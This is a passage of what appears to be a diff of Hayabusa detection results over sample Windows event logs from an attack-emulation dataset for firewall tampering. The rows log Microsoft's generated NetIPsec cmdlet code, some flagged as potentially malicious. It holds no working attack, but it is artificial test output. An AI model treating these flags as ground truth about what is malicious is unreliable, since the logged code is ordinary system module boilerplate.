'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param(",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"meterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param(",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, 